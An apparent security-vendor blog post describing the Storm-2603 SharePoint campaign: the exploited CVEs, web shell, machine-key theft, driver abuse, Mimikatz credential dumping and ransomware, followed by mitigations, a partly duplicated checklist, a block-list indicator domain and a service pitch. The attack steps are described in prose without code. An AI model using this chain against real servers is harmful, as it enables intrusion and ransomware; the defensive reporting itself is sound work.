On July 18, 2025, a threat group known as Storm-2603 began exploiting a set of vulnerabilities in on-premise Microsoft SharePoint servers. These flaws were found in the ToolPane.aspx page and were labeled CVE-2025-49704, CVE-2025-49706, and later CVE-2025-53770 and CVE-2025-53771. The attackers used these vulnerabilities to bypass authentication and deploy a web shell named spinstall0.aspx. This allowed them to access sensitive machine keys, maintain persistent sessions, and control systems without detection. This marked the start of the widespread Storm-2603 Backdoor Attack.
After deploying the backdoor, the attackers used PowerShell commands, DLL sideloading, and driver exploits to disable security tools, steal credentials, and install ransomware. They primarily delivered Warlock and LockBit Black ransomware strains. More than 400 organizations were affected, including critical US government entities like the National Nuclear Security Administration. The Storm-2603 Backdoor Attack quickly gained attention for its stealth and scale.
This attack chain was rapid, stealthy, and highly coordinated. Organizations that were running unpatched or partially patched versions of SharePoint were the primary targets. Even after applying official Microsoft patches, the attackers could bypass security controls using the extracted machine keys and maintain unauthorized access. It became evident that the Storm-2603 Backdoor Attack exploited deep architectural gaps in enterprise defenses.
Step-by-Step Breakdown of the Storm-2603 Backdoor Attack
- Initial Exploitation: The attackers sent a specially crafted POST request to the ToolPane.aspx page of the SharePoint server. This request included a fake Referer header, tricking the application into allowing unauthorized access.
- Web Shell Installation: Once inside, they deployed a web shell called spinstall0.aspx. This gave them a command-and-control point directly inside the server, anchoring the Storm-2603 Backdoor Attack.
- Machine Key Extraction: The attackers used a custom DLL named IISServerdll.dll to extract cryptographic machine keys from the server. These keys allowed them to generate forged session cookies and maintain access even if the credentials were changed or the server was rebooted.
- Privilege Escalation and Reconnaissance: With the web shell in place, they launched encoded PowerShell scripts to scan the network. They used tools like SharpHostInfo and masscan to identify high-value targets within the environment.
- Disabling Security: The attackers deployed a malicious driver called ServiceMouse.sys. This driver was used to disable antivirus protections using a bring-your-own-vulnerable-driver method. Once the defenses were down, they continued their lateral movement undetected.
- Credential Harvesting: Using Mimikatz, they dumped credentials from the LSASS process. These credentials helped them log in to other machines in the network using tools like PsExec and Impacket.
- Ransomware Deployment: Finally, they deployed Warlock or LockBit Black ransomware. These were delivered using DLL hijacking through applications like 7z.exe or via malicious MSI installers. Once executed, files were encrypted, and ransom notes were dropped across the infected systems. This completed the Storm-2603 Backdoor Attackchain.
This multi-step attack shows how even a single vulnerability, if unpatched, can be used to carry out a full-scale network compromise.
Who Was Behind the Attack?
Storm-2603 is believed to be a China-based hacking group. Microsoft and Check Point identified their tactics as distinct from other known Chinese threat actors like APT27 and APT31. While all three groups targeted SharePoint servers, the Storm-2603 Backdoor Attack stood out due to its use of a unique framework called AK47 C2 for command-and-control.
The AK47 C2 framework uses two modules. The first one is AK47DNS, which tunnels command traffic through DNS queries. The second one is AK47HTTP, which sends commands over HTTP. This approach makes detection extremely difficult. They even used fake domains like update.updatemicfosoft.com to disguise their traffic.
The group has been active since at least March 2025. They primarily target organizations in Asia-Pacific and Latin America. Their operations show a mix of cyber espionage and financial crime, blending advanced persistent threat tactics with ransomware deployment.
Their toolkit includes open-source tools and custom-developed payloads. They often use DLL sideloading, vulnerable driver exploits, and stealthy persistence techniques. Their focus on stealing machine keys and using them for long-term access shows their deep understanding of SharePoint internals. The Storm-2603 Backdoor Attack was one of the most advanced and persistent threats in 2025.
Consequences and Financial Impact
The impact of the Storm-2603 Backdoor Attack was massive. At least 400 organizations were affected worldwide. These included government agencies, educational institutions, critical infrastructure providers, and private companies. Financial losses from the attack were significant. Many organizations faced ransom demands, lost access to their data, and had to pay for extensive recovery efforts.
For individuals, the consequences were also serious. Many employees had their login credentials stolen. Sensitive internal documents were encrypted or leaked. In some cases, systems were offline for days or weeks, causing operational paralysis.
This incident also raised alarms in political and media circles. News agencies highlighted the failure of early patching and the delayed response from some vendors. Security analysts criticized the lack of deep monitoring and the over-reliance on perimeter defenses.
From a global perspective, the Storm-2603 Backdoor Attack added tension between China and Western countries. While China denied any involvement, security experts pointed to a pattern of behavior that matched past state-sponsored campaigns.
How to Protect Yourself from the Storm-2603 Backdoor Attack

Here’s how you can stay safe:
- Apply Microsoft’s July 2025 security updates for SharePoint without delay.
- Enable Antimalware Scan Interface (AMSI) in full mode and run a reliable antivirus solution.
- Rotate ASP.NET machine keys and restart the IIS server.
- Monitor HTTP logs for access to ToolPane.aspx and other unusual traffic.
- Watch for PowerShell script execution (Event ID 4104) and AMSI logs.
- Block DNS traffic to suspicious domains like update.updatemicfosoft.com.
- Use endpoint detection tools that can spot Mimikatz, PsExec, and DLL hijacking.
- Train your IT teams to recognize signs of credential theft and lateral movement.
- Develop an incident response plan with defined steps for containment and recovery.
Quick Checklist
- Patch SharePoint Immediately
- Always apply the latest SharePoint patches as soon as they are released. This reduces the risk of known vulnerabilities being exploited. Microsoft’s July 2025 update specifically addresses the flaws used in the Storm-2603 Backdoor Attack.
- Always apply the latest SharePoint patches as soon as they are released. This reduces the risk of known vulnerabilities being exploited. Microsoft’s July 2025 update specifically addresses the flaws used in the Storm-2603 Backdoor Attack.
- Enable Full-Mode AMSI
- AMSI (Antimalware Scan Interface) should be enabled in full scan mode. It allows antivirus tools to analyze and block malicious scripts, especially obfuscated PowerShell commands used by attackers in the Storm-2603 Backdoor Attack.
- AMSI (Antimalware Scan Interface) should be enabled in full scan mode. It allows antivirus tools to analyze and block malicious scripts, especially obfuscated PowerShell commands used by attackers in the Storm-2603 Backdoor Attack.
- Rotate Machine Keys
- Machine keys used for cryptographic operations in ASP.NET must be rotated regularly. This prevents attackers from reusing stolen keys to forge authentication tokens or cookies.
- Machine keys used for cryptographic operations in ASP.NET must be rotated regularly. This prevents attackers from reusing stolen keys to forge authentication tokens or cookies.
- Monitor Logs (IIS, AMSI, PowerShell)
- Enable and review logs for suspicious behavior. Track access to sensitive URLs like ToolPane.aspx, monitor PowerShell execution logs (Event ID 4104), and analyze AMSI telemetry for unusual script activity.
- Enable and review logs for suspicious behavior. Track access to sensitive URLs like ToolPane.aspx, monitor PowerShell execution logs (Event ID 4104), and analyze AMSI telemetry for unusual script activity.
- Block Malicious DNS Domains
- Set firewall and DNS filters to block access to known command-and-control domains used in the Storm-2603 Backdoor Attack.
- Set firewall and DNS filters to block access to known command-and-control domains used in the Storm-2603 Backdoor Attack.
- Deploy Endpoint Detection Tools
- Use advanced endpoint protection platforms that can detect credential theft tools (like Mimikatz), lateral movement methods (like PsExec), and DLL sideloading attempts.
- Use advanced endpoint protection platforms that can detect credential theft tools (like Mimikatz), lateral movement methods (like PsExec), and DLL sideloading attempts.
- Educate IT Teams
- Regular training helps IT staff recognize signs of compromise and respond quickly. They should know how to detect and mitigate web shells, script-based attacks, and malicious driver installations.
- Regular training helps IT staff recognize signs of compromise and respond quickly. They should know how to detect and mitigate web shells, script-based attacks, and malicious driver installations.
- Prepare a Solid Incident Response Plan
- Have a clear, documented response strategy that includes detection, containment, eradication, and recovery steps. Conduct tabletop exercises to ensure your team is ready when an incident occurs.
- Have a clear, documented response strategy that includes detection, containment, eradication, and recovery steps. Conduct tabletop exercises to ensure your team is ready when an incident occurs.
Additional Subtopics for Better Protection
- Isolate High-Value Systems
- Critical systems should be segmented from the rest of the network. If one system is compromised, this containment reduces the risk of the attacker reaching other sensitive areas.
- Apply the Principle of Least Privilege
- Only give users and applications the minimum level of access required. This limits the potential damage if an account is compromised during the Storm-2603 Backdoor Attack.
- Audit and Harden Configuration Settings
- Regularly review server and application configurations. Disable unused features, close unnecessary ports, and ensure that security settings follow best practices.
- Implement Multi-Factor Authentication (MFA)
- MFA can block many attacks that rely on stolen credentials. Ensure that administrative accounts, especially those with access to SharePoint or domain controllers, are protected by MFA.
- Backup Regularly and Test Recovery
- Maintain frequent and secure backups of all critical systems and data. Test your recovery process to make sure it works before you actually need it.
- Watch for Suspicious Lateral Movement
- Use behavioral analytics tools to detect unusual login patterns, unexpected admin access, or large data transfers across internal systems.
- Set Up Threat Intelligence Feeds
- Use real-time threat intelligence to stay updated on indicators of compromise (IOCs), malicious IPs, and attack trends. Integrate this intelligence into your SIEM system to defend against the Storm-2603 Backdoor Attack and similar threats.
Lessons Learned from the Storm-2603 Backdoor Attack
Here’s what we can take from the Storm-2603 Backdoor Attack:
- Always assume that a single vulnerability can lead to total compromise.
- Relying on initial patches alone is not enough.
- Attackers can remain in a system even after patches are applied.
- Defense should be layered, including network monitoring, endpoint protection, and regular audits.
- Deep visibility into logs is essential for early detection.
Hoplon Infosec recommends building a strong cyber hygiene culture. This includes training, monitoring, incident readiness, and investing in endpoint protection. Organizations should not wait for an incident to start preparing. They should build security into their workflows from the beginning.
Final Summary
- Patch all systems, especially critical platforms like SharePoint
- Monitor all internal traffic and scripts
- Educate staff about common attacker tools
- Use detection tools that go beyond antivirus
- Have a response plan ready to counter incidents like the Storm-2603 Backdoor Attack
How Hoplon Infosec Can Help
Hoplon Infosec offers a wide range of solutions to protect against advanced cyber threats like the Storm-2603 Backdoor Attack. Their services include threat detection, penetration testing, app security assessments, phishing protection, and data encryption strategies. Whether you are an enterprise or a small team, Hoplon helps you build a proactive and resilient security posture.
Prepare before it’s too late. Hoplon Infosec stands by to defend your digital environment with strength and speed.
Explore our core cybersecurity services:
- Mobile Security
- Endpoint Security
- Deep and Dark Web Monitoring
- ISO Certification and AI Management System
- Web Application Security Testing
- Penetration Testing
For more services, visit our homepage.
Follow us on X (Twitter), LinkedIn, YouTube, Facebook, and Instagram for the latest cybersecurity updates. At Hoplon Infosec, we’re committed to securing your digital world.